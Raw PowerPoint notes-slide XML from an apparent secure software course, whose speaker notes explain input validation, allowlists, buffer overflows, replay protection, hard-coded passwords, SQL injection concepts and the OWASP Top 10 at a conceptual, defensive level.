              <a:t>70</a:t>
            </a:fld>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E61C2733-FB21-4656-812E-52ED301DF48A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3E23D1-CCFC-4D43-BBB6-295C302DC11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71684" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CFB754-1311-449C-B7A2-44137E0BEC6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353DD82-9C0C-42A3-9005-C222466F0F50}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>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B86B21B-17BF-4CF4-AB63-1C7E206BC39E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66312C80-1E4A-498E-B153-944E310CB85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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73732" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49281ECE-21DB-463B-B54C-7DA98D6987C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98267AA-8EE6-43B4-845A-A9E41E48DB11}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>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0BA97863-4114-4ACD-8016-89F721D56309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5A098C-814E-4FA8-8EE9-213A1F2C533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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75780" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5B2F48-86E5-4CC6-B5A7-4C086A78261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6018560-84AF-400B-B8DD-C3E3BBF1C7F0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>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4673BD61-ADCE-4E70-B8D0-F05DE8A3DFA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056C844-806B-4D40-AC4E-F401551D778C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B16616A2-6270-445F-8791-85161384B3DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AEEF070-CA9B-4265-ABCD-23D5BAEC89D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1- there are tools to save session state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2- Input validation and authentication should be done at both client and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3- True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4- The entire web form should be validated, more than the data can be invalid.</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96FD051F-06A0-42B0-88F6-DC10CBA20227}"/>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2144B048-12EB-4A4D-9D46-87CCAA921F9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2: an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>allowlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a list of all allowable inputs; anything else is rejected.  This avoids leaving a system vulnerable to new hacker innovations and/or stuff the administrator (programmer?) just forgot about.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{484A08B0-EC8A-4B1F-BEF9-B5909B241C3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A656645-E6E8-45BC-81E2-48D340AC175C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</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3064DFBE-CBCF-4C35-BF8C-429F5D55502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768393F-2656-4C08-937B-6DB765A9C109}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE0BDB5-69EB-4A75-B978-2CCDA22C439F}"/>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79B07B71-D57A-439C-82CB-A7940EDE0E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Here when the zzzzz was entered, variables following the Name field were overlaid.  This can happen at the assembly language level or at the high level language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value entered into the ‘name’ field was too long for the program to process, so the excess overwrote the next sections of the buffer.  A skilled cracker can use this flaw to gain control of a program or an OS.</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F31DB5B7-2B2C-412F-A592-3247FBB6A726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7997ABF1-A4C9-47EB-BD3E-209A4336CF8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Which questions refer to access control?  1 does not clearly relate to access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 3 and 4 are not realistic.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2731C17-3B99-4050-B00A-A62A7E40D03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FDC1BF6-26A1-4A2E-82B2-62283608E22A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>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F05C655D-0E04-4DA9-9144-846D04384B21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0178972-75A0-4E2D-B272-2A723E46C83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Sanitization = input cleanup, and is most important.  It is helpful in sanitization if a clearly defined code is used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18D8D96-F338-4690-96CB-59986B73AB4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BDCAB4B-BAC4-49C0-B0FB-753D54A22985}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>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78930684-BF39-42F4-844C-83775B2179B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3BFA53A-7DF8-4D3B-ACEA-779B300D0D4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Nonce = active authorization ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Positive negative checks do not refer to transmission.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Integrity checking does refer to transmission, but does not work with multiple transmissions of the same packet, since all replays will appear valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{324644B9-66A1-4D69-BAE7-8A01F8362EA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1A24764-764C-4A09-B683-3B9B217FB8A5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>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2094E5B7-918A-47D6-8CEE-6DBE3587EAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36418764-65A7-40EE-B955-82FACE81E79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Hard-coded passwords means once the password is known, everyone can attack until the potentially distributed code is physically changed – a really bad idea!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88068" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E632F3D9-8B01-4074-B9AE-1B7FC037D1E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B25E0BF-8097-47CD-919B-E2E70EA6C667}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B34400B-45D5-47D3-A996-502FCB5E2EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8315CAB-1D39-4C5E-8781-E44F2B7E8EA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Integrity checking = hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Positive, negative checks are not a transmission concern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Encrypted packets can still be modified, although we don’t know the outcome.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90116" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62D1D28A-7566-43F0-94CB-44B58524F8E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1B6BD33-3B63-4628-930B-077E30C49465}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>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id="{7D19245A-ACF8-4491-8093-BDAB85D6CB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0A8E778-568A-418C-80EE-A78C3ADFED13}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C11F9E9F-D57A-4429-B993-5CBE3F9302EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92164" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71BDBF6-C0D3-4B4E-9B28-2A181CBA41B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Race conditions may result in invalid data, but is not likely to result in break-in.  The others can lead to break-in.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AC7A6332-F204-49F6-ADC2-2818320B2ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{386D6848-17FF-4488-82DC-458B402B1DE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Attackers insert SQL commands where they don’t belong to try and get information from (or about) the database – or change it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tautology: an expression that is always accurate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9DC1A6B-3CD4-4B7D-9149-25C7C922BE3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473A0F6-1329-49F7-A568-ACB8C45BB241}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1639020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AC7A6332-F204-49F6-ADC2-2818320B2ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{386D6848-17FF-4488-82DC-458B402B1DE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Attackers insert SQL commands where they don’t belong to try and get information from (or about) the database – or change it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network security education: SQL injection attacks, S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zivanic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ruvceski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Basicevic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tautology: an expression that is always accurate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9DC1A6B-3CD4-4B7D-9149-25C7C922BE3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473A0F6-1329-49F7-A568-ACB8C45BB241}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="541483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81313429-3377-4A6B-BDEB-95433A2BE6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2D5E18-3CE5-42ED-9855-42FDF0781F0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With this problem, attackers use an SQL feature to exit SQL and to access the operating system command line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C210FAB-4BD7-4791-8E21-1BEE615CD1B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616EAD-8124-4A70-91B4-C96125E30750}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14930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OWASP Top 10 - 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{006D0218-2B54-4A95-9FE9-6F57B92F1A87}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40968942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A02F2A83-FEDA-4FC7-905C-6DB690A12000}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3D744A7-0984-44E4-AE48-EB90321DF31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Persistence software is a software package </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that may help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in sanitizing input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C97D066-B433-47C6-A44C-ACB42B1E91B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67D7FA5-AC30-4C3C-A776-5C9930C65F31}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
